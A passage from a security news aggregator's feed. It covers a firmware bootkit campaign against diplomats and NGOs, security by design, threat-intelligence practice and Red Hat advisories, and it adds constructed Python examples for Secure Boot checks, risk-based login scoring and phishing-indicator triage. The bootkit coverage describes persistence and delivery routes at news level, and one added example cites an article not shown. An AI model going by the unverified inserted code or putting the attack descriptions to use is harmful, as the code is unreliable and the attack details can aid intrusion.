Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …


The post Open Source Threat Intelligence Searches for Sustainable Communities appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/open-source-threat-intelligence-searches-for-sustainable-communities/?utm_source=rss&utm_medium=rss&utm_campaign=open-source-threat-intelligence-searches-for-sustainable-communities

Rare Firmware Rootkit Discovered Targeting Diplomats, NGOs

Second-ever sighting of a firmware exploit in the wild is a grim reminder of the dangers of these mostly invisible attacks.

It’s a silent and deadly threat long dreaded by security experts: malware entrenched in a computer’s firmware, where it survives reinstalling the operating system and even wiping or replacing the hard drive.

These mostly invisible firmware rootkit, or bootkit, attacks have so far been very rare, but researchers at Kaspersky have discovered one in the wild. The custom rootkit compromised the Unified Extensible Firmware Interface (UEFI) firmware, the code stored in the system’s flash chip that initializes the hardware and loads the operating system. The malware implant, just one module in a larger attack framework Kaspersky named MosaicRegressor, appears to have been written by a Chinese-speaking actor, based on several artifacts and language clues, the researchers say.

The attackers pointed MosaicRegressor at African, Asian, and European diplomatic and nongovernmental organizations between 2017 and 2019. Two victims were found with the UEFI bootkit infection. All of the targets had some link to North Korean interests, either as nonprofits focused on the country or through a presence there.

This is only the second known case of a UEFI bootkit attack in the wild. The first, revealed two years ago by ESET, was used by the Russian nation-state hacking group Fancy Bear, aka Sednit/Sofacy/APT28, best known for its 2016 attack on the Democratic National Committee. That so-called LoJax malware was a trojanized version of Absolute Software’s LoJack anti-theft agent, which many machine vendors embed in firmware, paired with a malicious UEFI module that reinstalled the agent at every boot.

“That was truly a significant finding,” said Mark Lechtik, senior security researcher at Kaspersky, who along with colleague Igor Kuznetsov detailed their research at Kaspersky’s SAS@home virtual event this week. What sets this second UEFI rootkit apart from the first, Lechtik said, is that it is a customized version of one developed by Hacking Team, the controversial Italian firm known for selling exploits and advanced attack modules to governments.

Hacking Team itself got hacked and doxed five years ago, and much of its code, including that of its UEFI rootkit, now lives on GitHub for researchers and attackers alike to experiment with.

“There was actually no evidence of [the Hacking Team rootkit’s] usage in the wild” until now, Lechtik said.

It was only a matter of time before an advanced threat group employed the Hacking Team UEFI bootkit. Jesse Michael, principal security researcher with Eclypsium, says he has built proof-of-concept versions of the code in his own research to study how it could be weaponized.

Bootkits are all about dwell time for an attacker, he says, even though they have not been widely used to date. The malware found by Kaspersky is based on “pretty simple code,” he says, and has plenty of room for enhancement. “There’s a lot you can do to take advantage of” the UEFI bootkit, he says. “This just scratches the surface.”

The Kaspersky researchers say they were not able to pinpoint how the attackers planted the bootkit on the victim machines and overwrote the legitimate UEFI firmware. They point to two possible scenarios. The first is physical access to the victim machine, akin to Hacking Team’s USB key tool. “Such a USB would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well,” they wrote in a blog post.

The other is a remotely delivered firmware “patch” carrying the malicious code, which would require defeating the platform’s firmware update authentication to pull off.

The bootkit’s main job is to deploy malware in a targeted file directory, Lechtik said. “So when the operating system starts, this malware file will be executed.”

The attackers also appeared to have used the Winnti backdoor, a popular tool among Chinese nation-state groups. Kuznetsov said he and the team were able to get one of the DLL files, which turned out to be an information-stealing tool that had archived the contents of the recently accessed documents folder. “It suggested the whole campaign was related to espionage activities. But we don’t have evidence to have any clues about what is actually the target” information, he said. MosaicRegressor has no known ties to any other threat groups that Kaspersky tracks.

Fighting the Invisible Enemy
It’s not easy to even track these types of attacks because there’s little visibility into them, researchers say. So, how do you protect against a bootkit attack?

Kaspersky says full-disk encryption such as Microsoft’s BitLocker is one mitigation: the bootkit has to write its payload into the operating system’s file system at boot, which it cannot do if the volume is encrypted. There is also Secure Boot, a feature supported on most modern computers that allows only signed boot loaders and drivers to run. Intel Boot Guard, a hardware root of trust in Intel platforms, extends verification below Secure Boot by checking the firmware’s initial boot block before it executes, which protects the UEFI firmware itself from tampering.

“But if the motherboard is misconfigured and protections are not in place — if Boot Guard is not turned on — there are huge problems for any platform” that gets targeted, Kuznetsov said.

Michael says he worries that the bootkit capability will ultimately be deployed in even more sophisticated attacks. For example, an attacker could wait for a BitLocker-protected system to be unlocked and only then “patch” it with the bootkit malware.
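Secure Boot is the one control above that an administrator can verify from inside the operating system, and it is worth knowing how to read the answer without trusting a GUI. The Python below is an added example written for this page, not Kaspersky’s or Eclypsium’s code: it decodes the two UEFI variables that matter, SecureBoot and SetupMode, in the layout the Linux efivarfs filesystem exposes them (a 4-byte little-endian attribute mask followed by the variable data; the variable GUID is the UEFI global-variable GUID). The byte strings in the demo are constructed. Note the caveat the article implies: Secure Boot only verifies what the firmware loads, not the firmware itself, and Boot Guard state is not visible through these variables at all (that needs a firmware-inspection tool such as chipsec or vendor tooling).

```python
"""Decode UEFI Secure Boot state from efivarfs-style variable contents.

Added example for this page. On Linux the kernel exposes each UEFI variable as
/sys/firmware/efi/efivars/<Name>-<GUID>; each file holds a 4-byte little-endian
attribute mask followed by the data. The sample byte strings are constructed.
"""
import struct
from pathlib import Path

EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"  # UEFI spec GUID
EFIVARS = Path("/sys/firmware/efi/efivars")


def parse_efivar(raw):
    """Split an efivarfs blob into (attributes, data); reject truncated records."""
    if len(raw) < 4:
        raise ValueError("efivar record shorter than its 4-byte attribute header")
    (attrs,) = struct.unpack_from("<I", raw, 0)
    return attrs, raw[4:]


def boot_posture(secure_boot_raw, setup_mode_raw):
    """Classify boot security from the SecureBoot and SetupMode variables.

    Either argument may be None, meaning the variable is absent (legacy/CSM
    boot or no EFI runtime services), which is itself a finding.
    """
    if secure_boot_raw is None:
        return {"state": "no-uefi-variables", "secure_boot": False, "setup_mode": False}
    _, sb = parse_efivar(secure_boot_raw)
    enabled = bool(sb and sb[0] == 1)
    setup = False
    if setup_mode_raw is not None:
        _, sm = parse_efivar(setup_mode_raw)
        setup = bool(sm and sm[0] == 1)
    if setup:
        state = "setup-mode"  # platform key not enrolled: nothing is verified
    elif enabled:
        state = "secure-boot-enabled"
    else:
        state = "secure-boot-disabled"
    return {"state": state, "secure_boot": enabled, "setup_mode": setup}


def read_live_posture():
    """Read the real variables on a Linux host (None where efivarfs lacks them)."""
    def load(name):
        path = EFIVARS / f"{name}-{EFI_GLOBAL_VARIABLE}"
        return path.read_bytes() if path.exists() else None
    return boot_posture(load("SecureBoot"), load("SetupMode"))


# Constructed records: attributes 0x06 (BOOTSERVICE|RUNTIME access), one data byte.
VAR_ONE = b"\x06\x00\x00\x00\x01"
VAR_ZERO = b"\x06\x00\x00\x00\x00"

if __name__ == "__main__":
    print("constructed sample:", boot_posture(VAR_ONE, VAR_ZERO))
    print("this host:", read_live_posture())
```

Running it on a Linux host reports one of four states; anything other than `secure-boot-enabled` on a fleet machine deserves a ticket, and `setup-mode` in particular means the platform key is missing so no signature is ever checked.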

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …


The post Rare Firmware Rootkit Discovered Targeting Diplomats, NGOs appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/rare-firmware-rootkit-discovered-targeting-diplomats-ngos/?utm_source=rss&utm_medium=rss&utm_campaign=rare-firmware-rootkit-discovered-targeting-diplomats-ngos

3 Ways Companies are Working on Security by Design

Execs from top financial organizations and other companies share insights on building a security culture.

As cybersecurity professionals seek to bolster security culture across the enterprise, the concept of security by design has grown in prominence.

It has several interpretations: baking security fundamentals into development requirements, building less obtrusive security features for the convenience of customers, improving usability of security tools within IT organizations, or all of the above. But security by design stands at the forefront of security’s role in digital transformation.

To kick off Cybersecurity Awareness Month, the National Cyber Security Alliance yesterday held a virtual 2020 Cybersecurity Summit that featured speakers from a number of organizations, including NIST, Bank of America, and Nasdaq. The big theme of the day was how security by design can aid in rolling out more usable security, for customers, internal users, technologists, and security personnel.

Here’s what the speakers there shared on how companies today are working on security by design:

Building Usable Software Securely

One of the highlights of the summit was a session led by Hari Gopalkrishnan, the client-facing platforms technology executive for Bank of America, who discussed the development of the firm’s virtual financial assistant, Erica. An AI-driven platform, Erica was developed from the outset with security by design principles as a core part of its success requirements.

“One of the key tenets before we got to anything functional was the fact that it had to be secure by design because to us security and privacy are table stakes,” Gopalkrishnan explained.

An obvious part of that was baking security into the design lifecycle: ensuring that data flows are secure, that authentication is appropriate, and so on. AppSec best practices such as code scanning and security testing of deployed software also remain top of mind. Less obvious parts of the security by design ethos behind Erica’s development have included examining the AI models for potential bias and building robust options for customers to opt in to or out of privacy-impacting choices such as geolocation and data use.

This is huge in an era of using digital information for personalization and tailored services.

“Some could argue a lot of, wow, wouldn’t it be delightful if you could use all the data available to you, and when you be able to create a bigger aha moment for a customer, if you did that, and the answer is maybe, but we don’t get to do that,” Gopalkrishnan said. “And that’s not the role that we play. When we think about responsibility in software development and responsibility as a bank to deliver to our customers, everything needs to be transparent.”

Making Security Features Frictionless

Strengthening security functionality while removing friction from the user experience is a huge part of security by design. While security transparency is important, the goal should be to abstract security actions away from the users where possible, said Roman Shapiro, director of information security for Nasdaq.

“Candidly, I think the industry is playing a little bit of catch-up in this regard, but we’ve learned to look closely at usage patterns — where you are logging in from, how you are logging in, and so on — taking sensible steps behind the scenes to give you the assurance you need that the session you’re establishing is one you have confidence in,” Shapiro says.

Multifactor authentication is one of the biggest friction points for users, agreed Steve Clark, managing director and business unit information security officer for Bank of America. Clark said analytics of user behavior patterns, applied to authentication and authorization decisions, will increasingly be used to reduce that friction, both in finance and in other industries.
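The “usage patterns” Shapiro and Clark describe (where you log in from, how, and whether that matches what the account normally does) are what a risk-based authentication engine turns into a step-up decision, so that a second factor is demanded only when the context is unusual. The following Python is an added example written for this page, not Nasdaq’s or Bank of America’s code. It scores a login against a per-user baseline on three signals (unknown device, unknown country, and travel faster than any airliner since the previous login) and maps the score to allow, step-up MFA, or deny. The baseline, the logins, and the weights and thresholds are all constructed for the demo; in production they would be tuned against the organization’s own login data.

```python
"""Risk-based step-up authentication: demand a second factor only when context is odd.

Added example for this page. The history, logins, weights and thresholds below
are constructed; a real deployment tunes them against its own login telemetry.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt
from typing import Optional


@dataclass
class Login:
    user: str
    when: datetime
    device_id: str
    country: str
    lat: float
    lon: float


@dataclass
class History:
    known_devices: set
    known_countries: set
    last: Optional[Login] = None


def km_between(a, b):
    """Great-circle (haversine) distance in km between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(radians, (a[0], a[1], b[0], b[1]))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def assess(login, hist):
    """Return (risk_score, reasons); a higher score justifies more friction."""
    score, reasons = 0, []
    if login.device_id not in hist.known_devices:
        score += 40
        reasons.append("new-device")
    if login.country not in hist.known_countries:
        score += 30
        reasons.append("new-country")
    if hist.last is not None:
        hours = (login.when - hist.last.when).total_seconds() / 3600
        dist = km_between((hist.last.lat, hist.last.lon), (login.lat, login.lon))
        if hours > 0 and dist / hours > 1000:  # faster than a commercial airliner
            score += 50
            reasons.append("impossible-travel")
    return score, reasons


def decide(login, hist, step_up_at=40, deny_at=90):
    """Map the risk score to an action; thresholds are illustrative."""
    score, reasons = assess(login, hist)
    if score >= deny_at:
        return "deny", reasons
    if score >= step_up_at:
        return "step-up-mfa", reasons
    return "allow", reasons


def _utc(hour):  # constructed timestamps, all on 2020-10-07
    return datetime(2020, 10, 7, hour, tzinfo=timezone.utc)


# Constructed baseline: alice normally logs in from one laptop in New York.
BASELINE = History({"laptop-1"}, {"US"},
                   Login("alice", _utc(12), "laptop-1", "US", 40.7128, -74.0060))

CASES = {
    "same-city": Login("alice", _utc(13), "laptop-1", "US", 40.7128, -74.0060),
    "cross-country-1h": Login("alice", _utc(13), "laptop-1", "US", 34.0522, -118.2437),
    "new-device-abroad": Login("alice", _utc(14), "tablet-9", "RO", 44.4268, 26.1025),
}


def run_demo():
    """Decide every constructed case against the baseline."""
    return {name: decide(login, BASELINE) for name, login in CASES.items()}


if __name__ == "__main__":
    for name, (action, reasons) in run_demo().items():
        print(f"{name:18} -> {action:12} {reasons}")
```

The point of the design is that the familiar case costs the user nothing, while the signals that feed the decision are ones the user never has to supply.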

Improving the Usability of Security Data

As security teams monitor how users are interacting with software assets and data on a daily basis, security by design will be crucial for setting security operators up for success as well. This means that teams are thinking closely about how the systems log user activity, what data is pulled from them and made available to SOC analysts, and how it is contextualized and enriched.

“What’s difficult to do is pulling out the signal from the noise,” explained Brian Vecci, field CTO for Varonis. “The next few years are going to be not necessarily aggregating more log information or more information. It’s going to be doing two things, creating more usable profiling that combines different kinds of information, not just logs, but other metadata that we have about users’ data, the devices that are being used, where people are coming from, the services that they’re using, the access and building really useful profiles about what’s normal to identify patterns of misbehavior.”

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.


The post 3 Ways Companies are Working on Security by Design appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/3-ways-companies-are-working-on-security-by-design/?utm_source=rss&utm_medium=rss&utm_campaign=3-ways-companies-are-working-on-security-by-design

Cyber Intelligence Suffers From ‘Snobby’ Isolationism, Focus on Rare Threats

Cyber-threat intelligence groups need to more often investigate their organization’s specific threats and better integrate with other business groups, experts say.

Cyber-threat intelligence (CTI) teams face a host of challenges — a shortage of skilled workers and a lack of resources, for example — but two of the most serious hurdles are, in many ways, self-inflicted: A “snobby” culture that isolates groups and often focuses on the latest interesting threats rather than the actual dangers facing the business, cybersecurity experts told attendees at two industry conferences last week.

Focusing on zero-day exploits and nation-state adversaries is naturally alluring for CTI teams, but the more common threats facing their organizations are cybercriminal phishing attacks and workers’ reuse of passwords, Xena Olsen, a cyber-threat analyst for Marymount University, said during a presentation on creating adversary detection pipelines at the virtual Black Hat Asia conference. To provide actionable intelligence for blue and red teams, CTI analysts should focus on the most common threats first, she said.

“Instead of looking what is actually going on in their network and threat landscape, some CTI analysts solely focus on public threat actor reporting and going for the sexy APTs, advanced persistent threats,” Olsen said, adding, “One of the main goals of adversary detection pipelines is to get really good at understanding simple attacks specific to your org[anization]’s infrastructure, controls, and detection.”

In addition, because CTI teams often collect some of the most knowledgeable security analysts into a group, they often isolate themselves from other departments in an organization. Instead, they need to become more accessible to the organization, otherwise the perception is that they are being “snobby,” Jamie Collier, CTI consultant at FireEye Mandiant, said in a presentation at the annual Virus Bulletin conference.

“It is really important that we get beyond that culture,” he said. “When it comes to someone who is ignorant about cybersecurity, and they read an article that stokes fears, there is nothing funny about that situation, and so we need to make sure we are helping these people.”

Almost half of all companies with a security-response capability have a dedicated CTI team, but the most popular forms of information consumed by the groups were open source CTI feeds, commercial feeds, and information from industry sharing groups, according to the “2020 SANS Cyber Threat Intelligence Survey.” Threat information based on internal log data from firewalls and endpoint systems ranked No. 5. Other internal sources of threat information ranked even lower.

The two cybersecurity experts presented their own critiques of CTI at the conference. Marymount University’s Olsen recommended an approach to threat intelligence that focuses on what is happening inside a company — gathering data on threats seen in email and enriching that with other internal event information — before attempting to use external threat information.

FireEye’s Collier focused on a “backcasting” scenario, where he assumed that the CTI industry failed in a decade and attempted to explain why. The top reasons: focusing on novel threats rather than the ones with the most impact, the isolationism of threat intelligence groups, and the overall skills shortage in the industry.

“They typically operate as almost a standalone function,” he said, speaking in the past tense, as his scenario deconstructed what happened to CTI from a future date. “We would have these very well written threat intelligence reports that would be produced on a variety of topics, but the audience of these reports was never clearly formulated. It was almost intelligence for the sake of intelligence.”

The allure of novel threats — both because they piqued the interest of researchers and made good marketing — poses another problem for CTI firms, he said. One reason is that threat intelligence has often become more a marketing exercise than a capability to provide actionable information to the business. Threat intelligence teams tend to focus on the novel and interesting threats — often looking to get media coverage — rather than the actual common threats for which companies have to be ready, Collier said.

“Between phishing, on one hand, and AI-enabled offense on the other, there is all these different attack vectors, but they pose really different threats,” he said. “AI-enabled threats may be interesting, but it is phishing that presents the real concern for the majority of organizations.”

Adversary detection pipelines are an approach that lets CTI teams analyze the operational data coming from their own company and narrow their focus to actual threats. Email and log files give information on real threats, which can then be enriched with information from other internal systems; only then is open source threat intelligence used to gather more data on the adversaries, Marymount University’s Olsen said.

The whole point is to “provide a prioritized workflow based on the attacks directed at the organization, through analysis performed by the CTI analyst,” Olsen said. “It is the focused creation of intelligence based upon specific requirements for the sole purpose of enriching other teams and improving the security posture of the organization.”
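Olsen’s pipeline and Morris’s advice in the earlier threat-intelligence piece (start from your own network data, treat feeds as context rather than as the starting point) describe the same workflow, so one example serves both. The Python below is an added example written for this page, not Olsen’s, GreyNoise’s, or MISP’s code. It takes reported phishing messages from a mail gateway, joins them with web-proxy records to see who actually reached the sender’s infrastructure, ranks each indicator by that internal impact, and only then annotates each row with which open source feeds already list it. It also computes the overlap between the two feeds, the measurement the university study in the earlier article made. Every log line and both feeds are constructed; the scoring weights are illustrative.

```python
"""Adversary detection pipeline sketch: internal telemetry first, feeds last.

Added example for this page. All records and both "feeds" are constructed.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed mail-gateway records: user-reported phishing, one URL per message.
MAIL_LOG = [
    {"msg_id": "m1", "recipient": "alice@corp.example", "url": "http://login-corp-example.com/auth"},
    {"msg_id": "m2", "recipient": "bob@corp.example", "url": "http://login-corp-example.com/auth"},
    {"msg_id": "m3", "recipient": "carol@corp.example", "url": "https://invoice-portal.net/dl/9921"},
    {"msg_id": "m4", "recipient": "dave@corp.example", "url": "http://198.51.100.23/o365/"},
]

# Constructed web-proxy records: who actually followed a link and got a response.
PROXY_LOG = [
    {"user": "bob@corp.example", "host": "login-corp-example.com", "status": 200},
    {"user": "carol@corp.example", "host": "invoice-portal.net", "status": 200},
    {"user": "carol@corp.example", "host": "invoice-portal.net", "status": 200},
]

# Constructed open source feeds (hostnames and IPs), deliberately with little overlap.
FEED_A = {"invoice-portal.net", "198.51.100.23", "203.0.113.77"}
FEED_B = {"198.51.100.23", "evil-cdn.example", "203.0.113.5"}


def host_of(url):
    """Indicator we pivot on: the hostname (or bare IP) of the phishing URL."""
    return urlsplit(url).hostname


def feed_overlap(a, b):
    """Jaccard overlap between two indicator sets; near zero is the usual finding."""
    return len(a & b) / len(a | b) if (a | b) else 0.0


def build_pipeline(mail_log, proxy_log, feeds):
    """Rank indicators by what happened inside the org, then annotate with feeds.

    Score = 10 per user who reached the host + 1 per user who was merely sent it,
    so a lure that got clicks outranks a widely sprayed one nobody followed.
    """
    targeted = defaultdict(set)  # host -> recipients who received the lure
    for rec in mail_log:
        targeted[host_of(rec["url"])].add(rec["recipient"])

    clicked = defaultdict(set)  # host -> users who reached it (successful responses only)
    for rec in proxy_log:
        if rec["host"] in targeted and rec["status"] < 400:
            clicked[rec["host"]].add(rec["user"])

    rows = []
    for host, victims in targeted.items():
        rows.append({
            "indicator": host,
            "targeted": len(victims),
            "clicked": len(clicked[host]),
            "score": 10 * len(clicked[host]) + len(victims),
            # Enrichment comes last: which public feeds already know this host?
            "feeds": sorted(name for name, feed in feeds.items() if host in feed),
        })
    rows.sort(key=lambda r: (-r["score"], r["indicator"]))
    return rows


if __name__ == "__main__":
    feeds = {"A": FEED_A, "B": FEED_B}
    print(f"feed overlap (Jaccard): {feed_overlap(FEED_A, FEED_B):.2f}")
    for row in build_pipeline(MAIL_LOG, PROXY_LOG, feeds):
        print(row)
```

On the constructed data the top-ranked indicator is the one no feed knows about, which is the article’s argument in one line: the feeds would have told the analyst about the least important host and nothing about the one a user actually authenticated to.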

Collier advised threat intelligence teams to take a good look at how they approach their analyses.

“CTI is quite a young industry, so we need to guard against complacency,” he said. “We need to be really reflective as an industry.”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …


The post Cyber Intelligence Suffers From ‘Snobby’ Isolationism, Focus on Rare Threats appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/cyber-intelligence-suffers-from-snobby-isolationism-focus-on-rare-threats/?utm_source=rss&utm_medium=rss&utm_campaign=cyber-intelligence-suffers-from-snobby-isolationism-focus-on-rare-threats

Feds Sound Alarm Over Emotet Attacks on State, Local Govs

CISA warned already-strained public-sector entities about disturbing spikes in Emotet phishing attacks aimed at municipalities.

The post Feds Sound Alarm Over Emotet Attacks on State, Local Govs appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/feds-sound-alarm-over-emotet-attacks-on-state-local-govs/?utm_source=rss&utm_medium=rss&utm_campaign=feds-sound-alarm-over-emotet-attacks-on-state-local-govs

Community ID support for Wireshark

By Christian Kreibich, Principal Engineer, Corelight The past few weeks have seen several developments around Community ID, our open standard for rendering network traffic flow tuples into a concise textual representation. I’d like to summarize them in this blog post. We introduced Community ID in 2018 to simplify the correlation of network traffic logs across…

The post Community ID support for Wireshark appeared first on Security Boulevard.


The post Community ID support for Wireshark appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/community-id-support-for-wireshark/?utm_source=rss&utm_medium=rss&utm_campaign=community-id-support-for-wireshark

MDM as a Microservice

With MDM becoming a requirement for macOS Big Sur, the prospect of MDM as a microservice gives IT admins flexibility while keeping devices secure.

The post MDM as a Microservice appeared first on JumpCloud.

The post MDM as a Microservice appeared first on Security Boulevard.


The post MDM as a Microservice appeared first on Malware Devil.



https://malwaredevil.com/2020/10/07/mdm-as-a-microservice/?utm_source=rss&utm_medium=rss&utm_campaign=mdm-as-a-microservice

ESB-2020.3461 – [RedHat] Red Hat OpenShift Virtualization: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3461
                   OpenShift Virtualization 2.4.2 Images
                              7 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Red Hat OpenShift Virtualization
Publisher:         Red Hat
Operating System:  Red Hat Enterprise Linux Server 7
                   Red Hat Enterprise Linux WS/Desktop 7
                   Red Hat Enterprise Linux Server 8
                   Red Hat Enterprise Linux WS/Desktop 8
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account            
                   Increased Privileges            -- Remote with User Interaction
                   Access Privileged Data          -- Existing Account            
                   Modify Arbitrary Files          -- Remote with User Interaction
                   Denial of Service               -- Remote with User Interaction
                   Access Confidential Data        -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-16845 CVE-2020-15586 CVE-2020-14365
                   CVE-2020-14352 CVE-2020-12825 CVE-2020-12402
                   CVE-2019-17023 CVE-2019-17006 CVE-2019-11756

Reference:         ESB-2020.3352
                   ESB-2020.3351
                   ESB-2020.3156
                   ESB-2020.3073
                   ESB-2020.3071
                   ESB-2020.3070

Original Bulletin: 
   https://access.redhat.com/errata/RHSA-2020:4201

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Low: OpenShift Virtualization 2.4.2 Images
Advisory ID:       RHSA-2020:4201-01
Product:           Container-native Virtualization
Advisory URL:      https://access.redhat.com/errata/RHSA-2020:4201
Issue date:        2020-10-06
CVE Names:         CVE-2019-11756 CVE-2019-17006 CVE-2019-17023 
                   CVE-2020-12402 CVE-2020-12825 CVE-2020-14352 
                   CVE-2020-14365 CVE-2020-15586 CVE-2020-16845 
=====================================================================

1. Summary:

Red Hat OpenShift Virtualization release 2.4.2 is now available with
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform.

Security Fix(es):

* golang: data race in certain net/http servers including ReverseProxy can
lead to DoS (CVE-2020-15586)

* golang: ReadUvarint and ReadVarint can read an unlimited number of bytes
from invalid inputs (CVE-2020-16845)

For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.

Bug Fix(es):

* Container-native Virtualization 2.4.2 Images (BZ#1877407)

This advisory contains the following OpenShift Virtualization 2.4.2 images:

RHEL-7-CNV-2.4
==============
kubevirt-ssp-operator-container-v2.4.2-2

RHEL-8-CNV-2.4
==============
virt-cdi-controller-container-v2.4.2-1
virt-cdi-apiserver-container-v2.4.2-1
hostpath-provisioner-operator-container-v2.4.2-1
virt-cdi-uploadproxy-container-v2.4.2-1
virt-cdi-cloner-container-v2.4.2-1
virt-cdi-importer-container-v2.4.2-1
kubevirt-template-validator-container-v2.4.2-1
hostpath-provisioner-container-v2.4.2-1
virt-cdi-uploadserver-container-v2.4.2-1
virt-cdi-operator-container-v2.4.2-1
virt-controller-container-v2.4.2-1
kubevirt-cpu-model-nfd-plugin-container-v2.4.2-1
virt-api-container-v2.4.2-1
ovs-cni-marker-container-v2.4.2-1
kubevirt-cpu-node-labeller-container-v2.4.2-1
bridge-marker-container-v2.4.2-1
kubevirt-metrics-collector-container-v2.4.2-1
kubemacpool-container-v2.4.2-1
cluster-network-addons-operator-container-v2.4.2-1
ovs-cni-plugin-container-v2.4.2-1
kubernetes-nmstate-handler-container-v2.4.2-1
cnv-containernetworking-plugins-container-v2.4.2-1
virtio-win-container-v2.4.2-1
virt-handler-container-v2.4.2-1
virt-launcher-container-v2.4.2-1
cnv-must-gather-container-v2.4.2-1
virt-operator-container-v2.4.2-1
vm-import-controller-container-v2.4.2-1
hyperconverged-cluster-operator-container-v2.4.2-1
vm-import-operator-container-v2.4.2-1
kubevirt-vmware-container-v2.4.2-1
kubevirt-v2v-conversion-container-v2.4.2-1
kubevirt-kvm-info-nfd-plugin-container-v2.4.2-1
node-maintenance-operator-container-v2.4.2-1
hco-bundle-registry-container-v2.4.2-15

3. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs
1869194 - HCO CR display name should contain "OpenShift Virtualization" instead of CNV
1869734 - OpenShift Virtualization does not appear in OperatorHub when filtering to "Disconnected"
1875383 - terminationGracePeriodSeconds should be updated in VMs created from common templates
1877407 - Container-native Virtualization 2.4.2 Images

5. References:

https://access.redhat.com/security/cve/CVE-2019-11756
https://access.redhat.com/security/cve/CVE-2019-17006
https://access.redhat.com/security/cve/CVE-2019-17023
https://access.redhat.com/security/cve/CVE-2020-12402
https://access.redhat.com/security/cve/CVE-2020-12825
https://access.redhat.com/security/cve/CVE-2020-14352
https://access.redhat.com/security/cve/CVE-2020-14365
https://access.redhat.com/security/cve/CVE-2020-15586
https://access.redhat.com/security/cve/CVE-2020-16845
https://access.redhat.com/security/updates/classification/#low

6. Contact:

The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----

The post ESB-2020.3461 – [RedHat] Red Hat OpenShift Virtualization: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/esb-2020-3461-redhat-red-hat-openshift-virtualization-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3461-redhat-red-hat-openshift-virtualization-multiple-vulnerabilities

ESB-2020.3460 – [RedHat] unbound: Denial of service – Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3460
                          unbound security update
                              7 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           unbound
Publisher:         Red Hat
Operating System:  Red Hat Enterprise Linux Server 7
                   Red Hat Enterprise Linux WS/Desktop 7
Impact/Access:     Denial of Service -- Remote/Unauthenticated
